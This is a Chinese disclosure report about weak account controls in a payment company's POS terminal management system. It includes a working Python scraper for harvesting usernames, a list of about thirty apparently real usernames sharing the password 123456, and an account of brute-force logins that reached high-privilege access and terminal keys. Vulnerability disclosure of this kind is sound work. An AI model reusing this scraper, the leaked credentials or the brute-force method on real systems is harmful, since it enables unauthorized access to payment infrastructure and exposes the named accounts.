首页 > 安全 > 网络安全 >

某大型第三方支付机构商务终端TPM系统用户体制不严涉及大量敏感信息

2016-06-07

通过手动远程下载来实现POS程序升级和通过自动远程下载来实现POS程序升级,以及新装机业务的程序、参数下载2 POS机由分公司灌装主密钥后分发到各地市,若有新装机,则由地市维护人员远程下装应用程序和参数

1 .通过手动远程下载来实现POS程序升级和通过自动远程下载来实现POS程序升级,以及新装机业务的程序、参数下载

2 .POS机由分公司灌装主密钥后分发到各地市,若有新装机,则由地市维护人员远程下装应用程序和参数来实现快速装机

中国银联终端远程维护管理系统(TMS)

http://

mask 区域

1.://**.**.**/tpm/ms/login.do

人名字典爆破

lijing/123456 权限不高但是也有不少数据 通过在线用户获取用户名

5.png

手爬太枯燥了

我这里直接代码上的是之后发送邮件处能查找的所以用户的列表和"在线用户方法一样"

#coding=utf-8

import requests

import re

from lxml import etree

import time

import sys

sys.getdefaultencoding()

reload(sys)

sys.setdefaultencoding('UTF-8')

sys.getdefaultencoding()

def postcode(pageId):

url = "http://***********/tpm/ms/user/userListLookupMul.do"

head = {

'Host': '***********',

'Proxy-Connection': 'keep-alive',

'Content-Length': '45',

'Accept': '*/*',

'Origin': 'http://***********',

'X-Requested-With': 'XMLHttpRequest',

'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0',

'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',

'Referer': 'http://***********/tpm/ms/index.do',

'Accept-Encoding': 'gzip,deflate',

'Accept-Language': 'zh-CN,zh;q=0.8',

'Cookie': 'JSESSIONID=************************'

}

data= "pageNum="+pageId+"&loginName=&name=&**.**.**.**rg=&hisIusr=&numPerPage=20"

proxy={'http':'**.**.**.**:8080'}

key = requests.post(url,headers=head,data=data,proxies=proxy)

#print key.headers

calc = key.text

#print calc

selector = etree.HTML(calc)

content = selector.xpath('//tr/td[@onclick="chooseTd(this)"][position()=1]/text()')

fp1 = open("C:\Users\Administrator\Desktop\\loginname1.txt",'a')

for i in content:

fp1.write(''.join(i.split())+'\n')

#获取验证码

fp = open("C:\Users\Administrator\Desktop\\id.txt")

#postcode('1')

print u'处理开始'

for i in fp:

postcode(i[:-1])

print 'page spider full%s'%i

tghe

ynli

ypwu

xzhguo

zhongduan2

ybjiang

tghe

ypwu

xjzhu

rbhong

ynli

yhzhang

hlliu3

taoluo

xiaxiao

lijing

geyong

xucao1

zztang

dlyang

caixq

kyyang

jingwang2

mjjiang

jilin1

yqjiang

VFI-QiuGX

jlchen2

ywang1

wangdw

hzdeng

jmguo

密码均为123456

jmguo/123456

登录几个高权限

4.png

TMS系统

3.png

开发项目信息

\

秘钥

2.png

20万+ 秘钥查看元素即可

2.png

解决方案:

1.验证码验证一次

2.用户体制不严

3.系统对外

相关文章
最新文章
热点推荐